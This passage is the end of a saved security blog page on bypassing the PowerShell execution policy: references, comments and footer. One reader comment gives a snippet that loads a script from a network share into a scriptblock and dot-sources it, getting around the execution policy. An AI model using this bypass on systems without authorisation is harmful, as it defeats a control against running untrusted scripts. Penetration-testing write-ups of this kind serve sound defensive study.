<li>http://blogs.msdn.com/b/powershell/archive/2008/09/30/powershell-s-security-guiding-principles.aspx</li>
<li>http://obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.html</li>
<li>http://roo7break.co.uk/?page_id=611</li>
<li>http://technet.microsoft.com/en-us/library/hh849694.aspx</li>
<li>http://technet.microsoft.com/en-us/library/hh849812.aspx</li>
<li>http://technet.microsoft.com/en-us/library/hh849893.aspx</li>
<li>http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html</li>
<li>http://www.hanselman.com/blog/SigningPowerShellScripts.aspx</li>
<li>http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html</li>
<li>http://www.nivot.org/blog/post/2012/02/10/Bypassing-Restricted-Execution-Policy-in-Code-or-in-Scriptfrom </li>
<li>http://www.powershellmagazine.com/2014/07/08/powersploit/</li>
</ul>
</div>
<span class="blog-icon post-tags"><strong>Tags:</strong> <a href="https://blog.netspi.com/tag/powershell/" rel="tag">powershell</a></span></article>
<div id="comments" class="comments-area comments-section">
<h2 class="comments-title">
Comments
</h2>
<ul id="annotations" class="comment-list">
<li id="comment-1" class="comment even thread-even depth-1">
<article id="div-comment-1" class="comment-body">
<footer class="comment-meta">
<div class="comment-author vcard">
<img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/ad516503a11cd5ca435acc9bb6523536.png" alt="" class="avatar avatar-32wp-user-avatar wp-user-avatar-32 alignnone photo avatar-default" height="32" width="32"> <b class="fn">essakhi</b> <span class="says">says:</span> </div><!-- .comment-author -->
<div class="comment-metadata">
<a href="https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/#comment-1">
<time datetime="2014-10-02T16:40:46+00:00">
October 2, 2014 at 4:40 pm </time>
</a>
</div><!-- .comment-metadata -->
</footer><!-- .comment-meta -->
<div class="comment-content">
<p>Thumb up for you. It is very interesting. Essakhi</p>
</div><!-- .comment-content -->
<div class="reply"><a class="comment-reply-link" href="https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/?replytocom=1#respond" onclick='return addComment.moveForm( "div-comment-1", "1", "respond", "1107" )' aria-label="Reply to essakhi">Reply</a></div> </article><!-- .comment-body -->
</li><!-- #comment-## -->
<li id="comment-26385" class="comment odd alt thread-odd thread-alt depth-1">
<article id="div-comment-26385" class="comment-body">
<footer class="comment-meta">
<div class="comment-author vcard">
<img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/9959a2436be816294bf54e13709b264b.png" alt="" class="avatar avatar-32wp-user-avatar wp-user-avatar-32 alignnone photo avatar-default" height="32" width="32"> <b class="fn">Nicholas Bostwick</b> <span class="says">says:</span> </div><!-- .comment-author -->
<div class="comment-metadata">
<a href="https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/#comment-26385">
<time datetime="2014-11-19T14:10:06+00:00">
November 19, 2014 at 2:10 pm </time>
</a>
</div><!-- .comment-metadata -->
</footer><!-- .comment-meta -->
<div class="comment-content">
<p>Another option is to do this:</p>
<p>$scriptcontents = [scriptblock]::create((get-content \\server\filepath.ps1|out-string))<br>
. $scriptcontents</p>
</div><!-- .comment-content -->
<div class="reply"><a class="comment-reply-link" href="https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/?replytocom=26385#respond" onclick='return addComment.moveForm( "div-comment-26385", "26385", "respond", "1107" )' aria-label="Reply to Nicholas Bostwick">Reply</a></div> </article><!-- .comment-body -->
</li><!-- #comment-## -->
</ul><!-- .comment-list -->
</div><!-- #comments -->
</div>
<div class="offset1 pull-left span3 bg-white" style="background: transparent;">
<img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Scott_360x160-360x160.jpg" alt="Scott Sutherland" class="avatar avatar-320 wp-user-avatar wp-user-avatar-320 alignnone photo" height="142" width="320"> <div class="blog-colpad" style="background: rgb(255, 255, 255);">
<div class="post-author">
<h4>Article By <a href="https://blog.netspi.com/author/scott-sutherland" rel="author">Scott Sutherland</a></h4>
</div>
</div>
</div>
</div>
</div>
</main><!-- #main -->
</div><!-- #primary -->
</div>
</div>
<footer>
<div id="footer-bottom">
<div class="container">
<div id="footer-buttons" class="pull-left">
<div class="footer-btn">
<a href="https://www.netspi.com/netspi-difference/correlatedvm"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/view-cvm-demo.png" alt="View CVM Demo" height="53" width="196"></a>
</div>
<div class="footer-btn">
<a href="https://www.netspi.com/about/contact"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/contact-sales.png" alt="Contact Sales" height="53" width="196"></a>
</div>
</div>
<div id="footer-title" class="pull-left">
<h3>Moving Pen Testing Forward - <br>In-depth, deep dive, manual testing by experts powered by NetSPIs CorrelatedVM Engine</h3>
<div id="copyright">
<span id="dnn_Footer_dnnCopyright_lblCopyright" class="SkinObject">Copyright 2015 by NetSPI. All rights reserved.</span>
<br>
</div>
</div>
<div id="footer-address" class="pull-left span2" itemscope="" itemtype="http://schema.org/Organization">
<address itemprop="address" itemscope="" itemtype="http://schema.org/PostalAddress">
<span itemprop="streetAddress">800 Washington Ave N<br> Suite 670<br></span>
<span itemprop="addressLocality">Minneapolis</span>,
<span itemprop="addressRegion">MN</span>
<span itemprop="postalCode">55401<br></span>
</address>
<span itemprop="telephone">612.465.8880 Phone<br></span>
<span itemprop="telephone2">888.270.0317<br></span>
<span itemprop="faxNumber">612.455.6988 Fax</span>
</div>
<div id="social-links" class="pull-left">
<h3>Follow Us On</h3>
<ul class="unstyled">
<li><a href="https://www.facebook.com/netspi" target="_blank"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/facebook.jpg" alt="Facebook" height="42" width="42"></a></li>
<li><a href="http://www.youtube.com/user/NetSPI10" target="_blank"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/youtube.png" alt="Google" height="42" width="42"></a></li>
<li><a href="https://github.com/NetSPI" target="_blank"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/github.png" alt="Google" height="42" width="42"></a></li>
<li><a href="https://twitter.com/NetSPI" target="_blank"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/twitter.jpg" alt="Twitter" height="42" width="42"></a></li>
<li><a href="http://www.linkedin.com/company/netspi" target="_blank"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/linkedin.jpg" alt="LinkedIn" height="42" width="42"></a></li>
<li><a href="https://plus.google.com/s/NetSPI" target="_blank"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/google-plus.jpg" alt="Google+" height="42" width="42"></a></li>
<li><a href="http://www.slideshare.net/NetSPI" target="_blank"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/slideshare.png" alt="Google+" height="42" width="42"></a></li>
</ul>
</div>
</div>
</div>
</footer>
</div><!-- #page -->
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/form.js"></script>
<link rel="stylesheet" id="crayon-css" href="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/crayon.css" type="text/css" media="all">
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/navigation.js"></script>
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/skip-link-focus-fix.js"></script>
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/comment-reply.js"></script>
<script type="text/javascript">
/* <![CDATA[ */
var CrayonSyntaxSettings = {"version":"2.6.9","is_admin":"0","ajaxurl":"https:\/\/blog.netspi.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""};
var CrayonSyntaxStrings = {"copy":"Press %s to Copy, %s to Paste","minimize":"Click To Expand Code"};
/* ]]> */
</script>
<script type="text/javascript" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/crayon.js"></script>
</body></html>